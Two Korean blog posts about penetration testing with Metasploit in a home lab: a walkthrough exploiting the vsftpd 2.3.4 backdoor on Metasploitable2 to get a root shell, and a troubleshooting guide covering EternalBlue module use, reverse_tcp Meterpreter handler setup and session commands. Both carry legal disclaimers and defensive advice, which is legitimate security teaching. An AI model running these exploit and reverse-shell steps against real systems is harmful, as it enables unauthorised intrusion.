13년차의 서버실

서버, 인프라, 홈랩 기술 블로그

[태그:] 익스플로잇

  • [보안] Metasploit 프레임워크를 활용한 모의 해킹: 실제 공격 기법 분석

    [보안] Metasploit 프레임워크를 활용한 모의 해킹: 실제 공격 기법 분석

    [보안] Metasploit 프레임워크를 활용한 모의 해킹: 실제 공격 기법 분석

    안녕하세요, 13년차 서버실 지킴이입니다. 인프라 엔지니어로 일하다 보면 항상 이런 고민을 하거든요. ‘내가 구축하고 관리하는 시스템은 과연 안전할까?’ 말로만 보안을 외치는 게 아니라, 실제 공격자들이 어떤 방식으로 시스템의 약점을 파고드는지 직접 경험해봐야 방어 전략도 제대로 세울 수 있잖아요? 그래서 오늘은 Metasploit(메타스플로잇) 모의 해킹 프레임워크를 활용해서 실제 공격 기법을 분석하고, 이를 통해 우리 시스템의 보안을 어떻게 강화할 수 있을지 이야기해보려 합니다.

    물론, 여기서 한 가지 짚고 넘어가야 할 점이 있습니다. ⚠️ 본 글은 보안 학습과 본인이 관리하는 시스템의 방어를 위한 교육 목적입니다. 타인의 시스템에 대한 무단 접근·공격은 불법이며 법적 처벌 대상입니다. 저는 홈랩에서 다양한 기술을 직접 실험해보면서 얻은 경험들을 공유하는 것이니, 여러분도 반드시 허가된 환경에서만 테스트하시길 강력히 권고합니다. 저도 처음엔 멋모르고 이것저것 해보다가 아찔했던 경험이 있거든요. ㅎㅎ

    Metasploit 프레임워크 주요 구성 요소 및 워크플로우 다이어그램

    Metasploit 프레임워크는 다양한 모듈로 구성되어 모의 해킹 과정을 체계적으로 지원합니다.

    Metasploit 프레임워크란? 모의 해킹의 첫걸음

    Metasploit Framework(메타스플로잇 프레임워크, MSF)는 쉽게 말해 ‘모의 해킹 도구들의 종합 선물 세트’라고 보시면 됩니다. 수많은 취약점(Vulnerability)들을 공격하는 익스플로잇(Exploit) 코드와, 성공적으로 시스템에 침투했을 때 실행할 수 있는 다양한 페이로드(Payload)들을 모아놓은 오픈소스 프로젝트죠. 보안 전문가들이 Penetration Test(페네트레이션 테스트, 침투 테스트)를 수행할 때 가장 많이 활용하는 도구 중 하나입니다. 저도 제 홈랩의 가상 머신들을 대상으로 주기적으로 Metasploit을 돌려보면서 ‘아, 이렇게 뚫릴 수도 있겠구나’ 하고 깜짝 놀랄 때가 많습니다.

    Metasploit은 크게 다음과 같은 모듈들로 구성되어 있어요.

    • Exploits (익스플로잇): 특정 취약점을 공격해서 시스템에 침투하는 코드입니다. 예를 들어, 웹 서버의 특정 버전에서 발견된 버그를 이용해 원격 코드 실행(Remote Code Execution, RCE)을 시도하는 거죠.
    • Payloads (페이로드): 익스플로잇이 성공했을 때 대상 시스템에서 실행되는 악성 코드입니다. 쉘(Shell)을 얻거나, 백도어를 설치하거나, 시스템 정보를 빼내오는 등 다양한 목적을 가집니다. 대표적으로 Meterpreter(미터프리터)가 있는데, 이건 정말 강력한 후속 작업 도구더라고요.
    • Auxiliary (보조 모듈): 직접적인 공격보다는 정보 수집(Scanning), 퍼징(Fuzzing) 등 다양한 보조 작업을 수행하는 모듈입니다. Nmap으로 포트 스캔하는 것처럼, Metasploit 내에서도 다양한 스캔 기능을 제공해요.
    • Post (포스트 모듈): 침투에 성공한 후, 추가적인 정보 수집이나 권한 상승(Privilege Escalation) 등 후속 작업을 수행하는 모듈입니다.

    이 모듈들을 어떻게 조합하느냐에 따라 다양한 모의 해킹 시나리오를 만들어볼 수 있습니다. 아래 표에서 각 모듈의 역할을 좀 더 자세히 비교해볼게요.

    모듈 유형 주요 역할 예시 기능 실전 활용
    Exploit 취약점 공격 및 침투 원격 코드 실행, 버퍼 오버플로우 대상 시스템에 초기 접근 권한 획득
    Payload 침투 후 실행될 코드 쉘 연결, Meterpreter 세션, 데이터 유출 침투 성공 후 원하는 작업 수행
    Auxiliary 정보 수집 및 보조 작업 포트 스캔, 서비스 버전 확인, 로그인 무작위 대입 공격 전 대상 시스템 정보 파악
    Post 침투 후 추가 작업 권한 상승, 시스템 정보 수집, 흔적 삭제 초기 침투 후 시스템 내부 탐색 및 제어

    실전 구현: 가상 환경에서 취약점 공격 시연하기

    자, 이제 직접 Metasploit을 활용해서 취약점을 분석해보겠습니다. 저는 Kali Linux(칼리 리눅스) 환경에 Metasploit이 설치되어 있다고 가정하고, 제 홈랩에 있는 Metasploitable2(메타스플로이터블2)라는 고의적으로 취약하게 만들어진 가상 머신을 대상으로 테스트할 거예요. 이 Metasploitable2는 다양한 옛날 취약점들이 그대로 노출되어 있어서 학습용으로 정말 좋거든요.

    1. Metasploit 콘솔 실행

    먼저 터미널에서 msfconsole 명령어로 Metasploit 프레임워크 콘솔을 실행합니다. 처음 실행하면 데이터베이스 초기화 등으로 시간이 좀 걸릴 수 있어요. 저는 늘 이 로고를 보면서 ‘오늘도 뭔가 새로운 걸 배우겠구나’ 하고 기대하곤 합니다.

    
    # msfconsole
    
    # _______ _________ _______  _______ _________ _______  _______ 
    # (  ___  )\__   __/(  ____ \(  ___  )\__   __/(  ____ \(  ___  )
    # | (   ) |   ) (   | (    \/| (   ) |   ) (   | (    \/| (   ) |
    # | |   | |   | |   | (__    | |   | |   | |   | (__    | |   | |
    # | |   | |   | |   |  __)   | |   | |   | |   |  __)   | |   | |
    # | |   | |   | |   | (      | |   | |   | |   | (      | |   | |
    # | (___) |___) (___| (____/\| (___) |___) (___| (____/\| (___) |
    # (_______)_______/(_______/(_______)_______/(_______/(_______)_
    # 
    #       =[ metasploit v6.3.36-dev                          ]
    # + -- --=[ 2419 exploits - 1205 auxiliary - 404 post       ]
    # + -- --=[ 671 payloads - 45 encoders - 10 nops           ]
    # + -- --=[ 8 evasion                                      ]
    
    # msf6 > 
    

    2. 취약점 검색 및 익스플로잇 선택

    Metasploitable2에는 vsftpd 2.3.4 버전의 백도어 취약점이 존재해요. 이 취약점을 이용해서 침투를 시도해보겠습니다. 먼저 search 명령어로 관련 익스플로잇을 찾아봅니다.

    
    msf6 > search vsftpd
    
    Matching Modules
    ================
    
       #  Name                                  Disclosure Date  Rank    Check  Description
       --  ----
       0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  Yes    VSFTPD v2.3.4 Backdoor Command Execution
    
    
    msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
    

    use 명령어로 해당 익스플로잇을 선택하면 프롬프트가 바뀌는 걸 볼 수 있죠? 이제 이 익스플로잇에 필요한 옵션들을 설정해야 합니다.

    Metasploit 콘솔에서 vsftpd 익스플로잇 검색 및 옵션 설정 화면

    Metasploit 콘솔에서 익스플로잇을 선택하고 옵션을 설정하는 과정입니다.

    3. 공격 옵션 설정하기

    show options 명령어로 어떤 옵션들을 설정해야 하는지 확인합니다. 여기서 가장 중요한 건 RHOSTS(대상 IP 주소)와 LHOST(내 공격자 IP 주소)입니다.

    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
    
    Module options (exploit/unix/ftp/vsftpd_234_backdoor):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOSTS                    yes       The target host(s), range CIDR identifier
       RPORT    21               yes       The target port (TCP)
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.100  # Metasploitable2 IP 주소
    RHOSTS => 192.168.1.100
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set LHOST 192.168.1.50   # Kali Linux IP 주소
    LHOST => 192.168.1.50
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
    

    여기서 RHOSTS(원격 호스트)는 공격 대상 시스템의 IP 주소이고, LHOST(로컬 호스트)는 공격을 시도하는 Kali Linux 시스템의 IP 주소입니다. 저도 처음에는 이걸 헷갈려서 한참 삽질했었는데, 쉽게 생각해서 ‘공격받을 놈’은 RHOSTS, ‘공격할 놈(나)’은 LHOST라고 기억하시면 편할 거예요.

    4. 익스플로잇 실행 및 결과 확인

    모든 옵션 설정이 끝났으면 exploit 또는 run 명령어로 공격을 실행합니다. 성공하면 Command Shell Session(명령 쉘 세션)을 얻게 됩니다.

    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
    
    [*] 192.168.1.100:21 - Backdoored VSFTPD v2.3.4 found
    [*] 192.168.1.100:21 - CMD: Trying command: id
    [*] 192.168.1.100:21 - CMD: Command output: uid=0(root) gid=0(root) groups=0(root)
    [+] 192.168.1.100:21 - CMD: Command shell session 1 opened (192.168.1.50:4444 -> 192.168.1.100:62000) at 2023-10-26 10:30:00 KST
    
    # command shell session 1
    id
    whoami
    pwd
    ls -al
    exit
    

    uid=0(root) 보이시나요? 이건 공격 대상 시스템에서 root(루트) 권한을 얻었다는 뜻입니다. 실제 환경이라면 정말 심각한 상황이죠. 이런 방식으로 공격이 성공하면, 공격자는 시스템의 모든 권한을 가지고 원하는 작업을 수행할 수 있습니다.

    ⚠️ 주의사항 및 트러블슈팅 팁

    제가 Metasploit을 사용하면서 겪었던 몇 가지 주의사항과 트러블슈팅 팁을 공유합니다.

    • 네트워크 설정: 가상 머신(Kali Linux, Metasploitable2) 간의 네트워크 설정은 정말 중요합니다. NAT(Network Address Translation) 모드보다는 Bridged(브리지) 모드로 설정해서 서로 같은 네트워크 대역에 있도록 하는 게 테스트하기 편하더라고요. IP 주소가 서로 통신 가능한지 ping 명령어로 꼭 확인하세요.
    • 방화벽 확인: 대상 시스템이나 공격자 시스템의 방화벽이 특정 포트를 막고 있지 않은지 확인해야 합니다. 특히 페이로드가 리버스 쉘(Reverse Shell)로 동작할 경우, 공격자(LHOST) 시스템의 특정 포트가 열려 있어야 대상 시스템에서 연결이 올 수 있습니다.
    • 익스플로잇 버전 호환성: 세상의 모든 취약점을 공격할 수 있는 만능 익스플로잇은 없습니다. 특정 익스플로잇은 특정 소프트웨어의 특정 버전에서만 동작해요. 따라서 정보 수집 단계에서 대상 시스템의 OS, 서비스, 버전 정보를 정확히 파악하는 것이 중요합니다. nmap -sV [대상 IP] 같은 명령어로 서비스 버전을 확인하는 습관을 들이세요.
    • 시스템 리소스: Metasploit은 꽤 많은 리소스를 사용합니다. 특히 Kali Linux를 VM으로 운영한다면, 충분한 RAM(최소 4GB)과 CPU 코어를 할당해주는 게 좋아요. 그렇지 않으면 콘솔이 버벅거리거나 익스플로잇 실행 중 멈추는 불상사가 생길 수 있습니다.

    검증 및 결과 분석: 방어 전략 수립

    이렇게 Metasploit을 통해 Command Shell을 얻는 과정을 경험하면, ‘아, 내 시스템의 이 부분이 이렇게 취약했구나’ 하고 직접적으로 느낄 수 있습니다. 제가 얻은 쉘 세션은 일종의 ‘발견된 취약점 보고서’ 같은 거죠. 단순히 ‘취약점이 있다’는 경고를 받는 것보다, 직접 침투에 성공하는 경험은 훨씬 강력한 동기 부여가 됩니다.

    이 결과는 다음과 같은 방어 전략을 세우는 데 활용될 수 있습니다.

    • 취약점 패치 및 업데이트: 이번 시나리오에서는 vsftpd 2.3.4의 백도어 취약점을 이용했는데, 이는 이미 오래전에 알려진 취약점입니다. 모든 소프트웨어는 최신 버전으로 유지하고, 보안 패치(Security Patch)를 즉시 적용하는 것이 가장 기본적인 방어입니다.
    • 불필요한 서비스 중지: 운영 중인 서버에서 사용하지 않는 서비스(FTP, Telnet 등)는 과감히 중지하거나 삭제해야 합니다. 공격 표면(Attack Surface)을 최소화하는 것이 중요하거든요.
    • 강력한 접근 제어: 관리자 계정의 비밀번호는 복잡하게 설정하고, SSH(Secure Shell)나 VPN(Virtual Private Network)을 통한 안전한 접근 방식을 강제해야 합니다.
    • 보안 솔루션 도입: IDS/IPS(침입 탐지/방지 시스템)나 WAF(웹 방화벽) 같은 보안 솔루션을 도입하여 비정상적인 트래픽이나 공격 시도를 탐지하고 차단하는 것도 중요합니다.
    모의 해킹 후 시스템 방어 전략 수립 인포그래픽

    모의 해킹으로 발견된 취약점은 시스템 방어 전략을 강화하는 중요한 밑거름이 됩니다.

    마무리하며: Metasploit, 방패를 벼리는 망치

    오늘은 Metasploit 모의 해킹 프레임워크를 활용해서 가상 환경에서 취약점을 분석하고, 실제 공격 기법을 이해하는 과정을 살펴봤습니다. 13년차 인프라 엔지니어로서 제가 늘 강조하는 건 ‘공격자의 시야’를 가져야 한다는 겁니다. 그래야 내 시스템의 약점을 제대로 파악하고, 강력한 방어책을 세울 수 있거든요. Metasploit은 그런 시야를 제공하는 아주 훌륭한 도구라고 생각합니다.

    이 글을 통해 Metasploit이 단순히 ‘해킹 도구’가 아니라, ‘보안을 강화하기 위한 강력한 학습 및 검증 도구’라는 점을 여러분이 느끼셨으면 좋겠습니다. 만약 여러분의 시스템에 어떤 취약점이 있는지 직접 파악하고 싶다면, 반드시 허가된 환경에서 Metasploit을 활용해보세요. 그 과정에서 얻는 인사이트는 어떤 보안 서적보다 값질 겁니다.

    다음 글에서는 Metasploit으로 찾은 취약점을 어떻게 막을지, 그리고 IDS/IPS(침입 탐지/방지 시스템)의 로그를 분석하여 공격을 탐지하는 방법에 대해 더 구체적으로 다뤄보겠습니다. 궁금한 점이 있다면 언제든지 댓글로 남겨주세요!

  • [보안] Metasploit 오류 해결: 침투 테스트 중 흔히 겪는 문제와 실전 해결법

    [보안] Metasploit 오류 해결: 침투 테스트 중 흔히 겪는 문제와 실전 해결법

    [보안] Metasploit 오류 해결: 침투 테스트 중 흔히 겪는 문제와 실전 해결법

    Metasploit 오류 해결 때문에 검색창을 붙잡고 계셨다면, 아마 지금 딱 비슷한 상황이실 겁니다. 익스플로잇(Exploit, 취약점을 실제로 악용하는 코드)은 분명 맞는 것 같은데 세션(Session, 원격 제어 연결)이 안 뜨고, 옵션도 다 넣은 것 같은데 실행이 실패하고, 어떤 때는 에러 메시지가 너무 짧아서 더 답답하거든요. 저도 홈랩(Home Lab, 개인 실험 환경)에서 모의 해킹 도구를 만지다가 이런 삽질을 정말 많이 했습니다. 처음엔 ‘내가 뭘 빼먹었지?’ 싶었는데, 실제로는 Metasploit 사용법 자체보다 환경 확인과 옵션 검증이 더 중요하더라고요.

    이 글에서는 침투 테스트 환경에서 Metasploit 프레임워크를 사용하다가 흔히 만나는 오류를 정리하고, 제가 직접 정리해 둔 체크 순서대로 해결하는 방법을 소개해보겠습니다. 모의 해킹 도구로서 Metasploit의 활용도는 높지만, 반드시 합법적인 테스트 환경이나 명시적 허가를 받은 시스템에서만 사용하셔야 한다는 점도 먼저 짚고 가겠습니다.

    Metasploit 오류 해결 전체 흐름을 보여주는 다이어그램

    Metasploit 실행 전 점검 항목과 오류 발생 후 확인 순서를 한눈에 보여주는 개요 이미지입니다.

    왜 Metasploit 오류 해결이 어려운가

    쉽게 말해 Metasploit은 한 개의 프로그램처럼 보여도, 실제로는 여러 요소가 맞물려 돌아갑니다. 대상 호스트(Target Host), 네트워크 경로(Network Path), 익스플로잇 모듈(Module), 페이로드(Payload, 실행 후 전달될 동작), 리스너(Listener, 연결 대기), 권한(Permission)까지 전부 맞아야 하거든요. 그래서 에러 메시지가 하나만 보여도 원인은 여러 군데에 숨어 있을 수 있습니다.

    실제로 써보니까 초보 때는 모듈만 맞으면 될 줄 알았는데, 근데 여기서 자주 막히는 건 오히려 이런 기본값입니다.

    • RHOSTS나 RPORT를 잘못 지정한 경우
    • PAYLOAD가 대상 환경과 맞지 않는 경우
    • LHOST가 잘못되어 역방향 연결(Reverse Connection)이 돌아오지 않는 경우
    • 방화벽(Firewall)이나 NAT(Network Address Translation) 때문에 세션이 차단되는 경우
    • 권한 부족 또는 데이터베이스(Database) 연결 문제

    여기서 중요한 포인트! Metasploit 오류 해결은 에러 문구만 읽는 게 아니라, 공격 전제 조건이 맞는지 역으로 검증하는 과정이라고 보시면 됩니다.

    Metasploit 사용법 먼저: 오류를 줄이는 기본 점검

    저도 처음엔 헷갈렸는데, 본격적으로 문제를 보기 전에 가장 먼저 해야 할 건 현재 모듈 상태를 읽는 습관입니다. 아래 명령은 정말 자주 씁니다.

    msfconsole
    search smb
    use exploit/windows/smb/ms17_010_eternalblue
    show info
    show options
    show payloads

    show info는 모듈 설명과 적용 조건을 보여주고, show options는 필수 옵션을, show payloads는 호환 가능한 페이로드 목록을 보여줍니다. 이 세 개만 꼼꼼히 봐도 쓸데없는 시행착오가 꽤 줄어듭니다.

    제가 보통 확인하는 순서는 이렇습니다.

    1. 모듈 설명에서 대상 서비스와 플랫폼을 확인해요.
    2. 필수 옵션이 비어 있지 않은지 봅니다.
    3. 대상 포트가 실제로 열려 있는지 별도 도구로 재확인합니다.
    4. 선택한 페이로드가 대상 운영체제와 아키텍처에 맞는지 확인해야 합니다.
    5. 역방향 페이로드(Reverse Payload)라면 LHOST/LPORT가 외부에서 도달 가능한지 체크하세요.

    사실 이 과정이 귀찮아서 건너뛰고 싶을 때가 많습니다. 저도 그랬거든요. 근데 이걸 건너뛰면 뒤에서 두 배로 삽질하게 돼요 ㅎㅎ

    실전 예시: 기본 실행 흐름부터 안정적으로 잡기

    아래는 가장 무난한 형태의 점검 흐름입니다. Metasploit 사용법 중 특정 취약점을 무작정 때리는 것보다, 서비스 확인 후 옵션을 단계적으로 채우는 방식이 오류를 줄이기 훨씬 좋습니다.

    msfconsole
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 192.168.56.1
    set LPORT 4444
    show options
    run

    핸들러(Handler, 연결을 받아주는 리스너)부터 따로 띄워두면 역방향 셸(Reverse Shell) 계열 문제를 분리해서 보기 좋습니다. 이후 대상 서비스 검증 쪽은 별도로 확인하죠.

    nc -vz 192.168.56.101 445
    nc -vz 192.168.56.101 80

    리눅스 환경이라면 nc(netcat) 같은 도구로 포트 응답을 먼저 보는 습관이 정말 도움이 됩니다. 대상이 응답하지 않는데 Metasploit만 계속 만져봐야 답이 안 나오니까요.

    Metasploit 오류 해결을 위한 msfconsole 설정 확인 이미지

    show options, 페이로드 선택, LHOST/LPORT 설정 흐름을 보여주는 터미널 중심 이미지입니다.

    자주 만나는 오류 1: Required options are missing

    이건 정말 흔합니다. 메시지 자체는 단순한데, 막상 뭐가 비었는지 못 보고 지나칠 때가 있어요. 보통 RHOSTS, RPORT, USERNAME, PASSWORD, TARGETURI 같은 값이 비어 있습니다.

    show options
    set RHOSTS 192.168.56.101
    set RPORT 445
    run

    여기서 제가 직접 해보니 중요한 건 옵션을 넣는 것보다 형식을 맞추는 것이더라고요. 예를 들어 여러 대상을 넣을 때는 RHOSTS 형식이 다를 수 있고, 웹 모듈은 TARGETURI가 루트 경로가 아닐 수도 있거든요. 단순히 값이 있다고 끝이 아닙니다.

    빠른 점검 체크

    • show options에서 Required 항목이 모두 채워졌는지 확인
    • IP 주소 오타 여부를 다시 한 번 체크
    • 웹 모듈이면 URI 경로 끝에 슬래시가 필요한지 확인
    • 자격 증명 기반 모듈이면 계정 권한 수준도 함께 점검하세요

    자주 만나는 오류 2: Exploit completed, but no session was created

    이 문구는 초반에 제일 사람 멘탈 흔드는 메시지입니다. 처음엔 이게 뭔가 싶었는데, 성공한 것처럼 보이는데 아무것도 안 생기니까 더 헷갈리거든요. 보통은 아래 원인 중 하나더라고요.

    • 페이로드 비호환: 대상 OS나 아키텍처와 맞지 않음
    • LHOST 문제: 대상이 돌아올 수 없는 IP를 지정함
    • 방화벽 차단: 역방향 연결이 막힘
    • 취약점 조건 불일치: 모듈은 실행됐지만 실제 취약하지 않음
    • 안티바이러스/EDR: 페이로드 실행 단계에서 차단됨

    이럴 때 저는 무조건 페이로드를 다시 봅니다.

    show payloads
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 192.168.56.1
    set LPORT 4444
    check
    run

    check가 지원되는 모듈이라면 먼저 실행해 보는 편이 정말 좋습니다. 물론 모든 모듈이 check를 지원하진 않지만, 지원한다면 대상이 취약한지 감을 잡는 데 꽤 도움이 돼요. 그리고 NAT 환경에서 테스트 중이라면 LHOST를 로컬 인터페이스 IP로 잘못 넣는 경우가 정말 많습니다. 저도 이걸로 한참 헤맸더라고요.

    자주 만나는 오류 3: Module not found 또는 검색은 되는데 실행이 이상한 경우

    가끔은 모듈 경로를 잘못 입력해서 생기는 단순한 문제도 있습니다. 예전 문서나 블로그 글을 그대로 따라치다 보면 현재 프레임워크 구조와 다를 때도 있고요. 그래서 저는 모듈명을 외우기보다 항상 search로 다시 찾습니다.

    search type:exploit samba
    search name:eternalblue
    use exploit/windows/smb/ms17_010_eternalblue

    혹시 모듈이 보이지 않거나 이상하게 동작하면, 문서에 나온 이름이 정확한지 다시 보고, 같은 계열의 다른 모듈이 있는지도 비교해 보세요. 같은 서비스라도 보조 모듈(Auxiliary Module, 정보 수집/검증용)과 익스플로잇 모듈이 따로 있는 경우가 많습니다.

    구분 역할 언제 쓰면 좋은가
    Auxiliary 스캔, 확인, 인증 시도 등 대상 상태를 먼저 검증할 때
    Exploit 취약점 악용 시도 취약 조건이 확인된 뒤
    Payload 성공 후 실행 동작 세션 획득 또는 명령 실행이 필요할 때
    Post 세션 이후 후속 작업 권한 확인, 정보 수집, 내부 이동 전 단계

    쉽게 말해, 처음부터 Exploit만 보지 마시고 Auxiliary로 주변 상황부터 확인하면 실패 원인을 분리하기 훨씬 수월합니다.

    ⚠️ 실제로 많이 겪는 문제 묶음: 권한, 포트, 데이터베이스

    이 섹션은 정말 실전에서 자주 튀어나옵니다. Metasploit 오류 해결을 검색하는 분들이 흔히 겪는 케이스만 묶어보면 아래와 같습니다.

    1. 포트는 닫혀 있는데 모듈부터 실행한 경우

    서비스가 안 떠 있는데 익스플로잇을 날리면 결과가 이상하게 보일 수 있습니다. 그래서 최소한 포트 수준 검증은 먼저 해두는 게 정말 중요합니다.

    nc -vz 192.168.56.101 445
    nc -vz 192.168.56.101 139

    2. 권한 부족 또는 리스닝 실패

    낮은 포트 바인딩이나 네트워크 관련 기능은 환경에 따라 권한 이슈가 생길 수 있습니다. 특히 실습 환경이 컨테이너(격리 실행 환경)나 제한된 사용자 계정일 때는 더 그렇더라고요. 에러가 애매하면 먼저 높은 포트로 바꿔 테스트해 보세요.

    set LPORT 4444
    run

    3. 데이터베이스 연결 문제

    workspace(워크스페이스), 스캔 결과 연동, 호스트 관리 기능을 쓰다가 데이터베이스 연결이 꼬이면 검색이나 저장 흐름이 불편해질 수 있습니다. 모든 공격이 데이터베이스에 의존하는 건 아니지만, 정리된 침투 테스트 작업에서는 꽤 중요하거든요. 만약 관련 기능이 비정상적으로 보이면 현재 데이터 저장 상태와 연결 상태를 먼저 점검하시는 게 좋습니다.

    4. 방화벽 때문에 역방향 세션이 안 돌아오는 경우

    이건 진짜 자주 봅니다. 내부망에서는 되는데 다른 망 구간만 지나면 안 되는 식이죠. 이럴 때는 대상에서 내 LHOST로 접속 가능한지 네트워크 경로를 따로 확인해야 합니다. Metasploit이 문제가 아니라 경로가 막힌 경우가 생각보다 많더라고요.

    Metasploit 오류 해결에서 자주 겪는 문제를 비교한 이미지

    옵션 누락, 세션 미생성, 방화벽 차단, 포트 미오픈 상황을 비교하는 문제 분석 이미지입니다.

    문제별로 바로 보는 Metasploit 오류 해결 체크리스트

    제가 메모장에 적어두고 보는 순서입니다. 한 번 꼬이기 시작하면 이것저것 바꾸다가 더 헷갈리니까, 가능하면 아래 순서대로만 확인해 보세요.

    1. 대상이 살아 있는지 확인합니다.
    2. 목표 포트가 실제로 열려 있는지 봅니다.
    3. 선택한 모듈이 대상 서비스/플랫폼과 맞는지 재확인합니다.
    4. show options로 필수 값 누락 여부를 체크합니다.
    5. show payloads로 호환 가능한 페이로드를 다시 골라봅니다.
    6. LHOST/LPORT가 실제로 되돌아올 수 있는 값인지 확인해야 합니다.
    7. check가 있으면 먼저 실행해 보세요.
    8. 방화벽, NAT, 권한 문제를 분리해서 봅니다.

    이 순서의 장점은 원인을 좁히기 정말 쉽다는 점입니다. 저도 예전엔 세션이 안 생기면 페이로드만 계속 바꿨었는데, 실제 원인은 대상 포트 오타였던 적도 있었습니다. 드디어 됐다! 싶었는데 너무 허무하더라고요.

    검증과 결과 확인: 성공했을 때 무엇을 봐야 하나

    세션이 떴다고 끝은 아닙니다. 성공 후에도 검증이 필요한데요. Meterpreter(고급 페이로드 세션)든 일반 셸이든, 최소한 아래 정도는 확인해 두시는 게 좋습니다.

    sessions
    sessions -i 1
    sysinfo
    getuid

    이 명령으로 현재 세션 목록, 대상 시스템 정보, 실행 권한을 확인할 수 있습니다. 세션이 생겼더라도 기대한 권한이 아닐 수 있고, 다른 호스트에서 온 세션일 수도 있거든요. 실습 환경이 여러 대일 때 특히 헷갈립니다.

    Metasploit 오류 해결 후 세션 검증 결과를 보여주는 이미지

    sessions, sysinfo, getuid 등으로 세션 성공 여부를 검증하는 결과 확인 이미지입니다.

    아래처럼 결과를 정리해 두면 다음 테스트 때도 훨씬 편합니다.

    확인 항목 성공 기준 실패 시 의심 포인트
    세션 생성 sessions 목록에 표시 페이로드, 방화벽, LHOST
    대상 정보 조회 sysinfo 응답 확인 세션 불안정, 권한 제한
    권한 확인 getuid 결과 확인 권한 상승 미적용, 제한 계정
    후속 모듈 실행 post 모듈 동작 플랫폼 불일치, 세션 타입 문제

    정리와 FAQ: 침투 테스트에서 덜 헤매는 방법

    정리해보면 Metasploit 사용법 자체는 명령 몇 개로 보이지만, 실제 현장에서는 환경 검증이 절반 이상입니다. Metasploit 오류 해결이 어려운 이유도 결국 여기에 있고요. 제가 인프라 관련 일을 하면서 느낀 건, 도구를 더 많이 아는 것보다 문제를 작게 쪼개서 확인하는 습관이 훨씬 중요하다는 점입니다.

    혹시 이런 경험 있으신가요? 분명 같은 명령인데 어제는 되고 오늘은 안 되는 경우요. 이런 건 대체로 네트워크 경로나 대상 상태가 바뀐 경우가 많습니다. 그러니 실패했을 때는 내 명령이 틀렸다고 바로 단정하지 말고, 아래 FAQ처럼 체크해 보시면 좋습니다.

    자주 묻는 질문

    • Q. 모듈은 맞는데 세션이 안 생깁니다.
      A. 페이로드 호환성, LHOST 경로, 방화벽 차단을 먼저 보세요. 이 세 가지가 가장 흔합니다.
    • Q. check 결과가 애매합니다.
      A. check는 참고 지표로 보시고, 포트 상태와 서비스 버전 추정 정보를 함께 확인하는 편이 안전합니다.
    • Q. 침투 테스트에서 어디부터 자동화해야 하나요?
      A. 옵션 템플릿, 결과 기록, 검증 순서를 먼저 정형화하는 게 좋습니다. 모의 해킹 도구 자동화보다 이쪽이 실수가 적더라고요.

    다음 글에서는 모의 해킹 도구를 여러 개 섞어 쓸 때, Nmap과 Metasploit 사이에서 정보를 어떻게 연결하면 좋은지 제 홈랩 기준으로 정리해볼 예정입니다. 이전 글에서 다뤘던 네트워크 기본 점검 습관과도 이어지는 내용이라 같이 보시면 흐름이 더 잘 잡히실 겁니다.

    Metasploit 오류 해결 핵심 포인트를 정리한 요약 이미지

    문제 원인별 점검 순서와 핵심 해결 포인트를 요약한 마무리 인포그래픽입니다.

    마지막으로 한 번 더 말씀드리면, 이 글의 예시는 교육용·실습용 맥락에서만 봐야 합니다. 허가받은 환경에서만 테스트하시고, 실제 운영망에서는 절차와 승인부터 챙기시는 게 정답입니다. 그 기본만 지켜도 Metasploit 같은 모의 해킹 도구를 훨씬 건강하게 오래 쓸 수 있더라고요.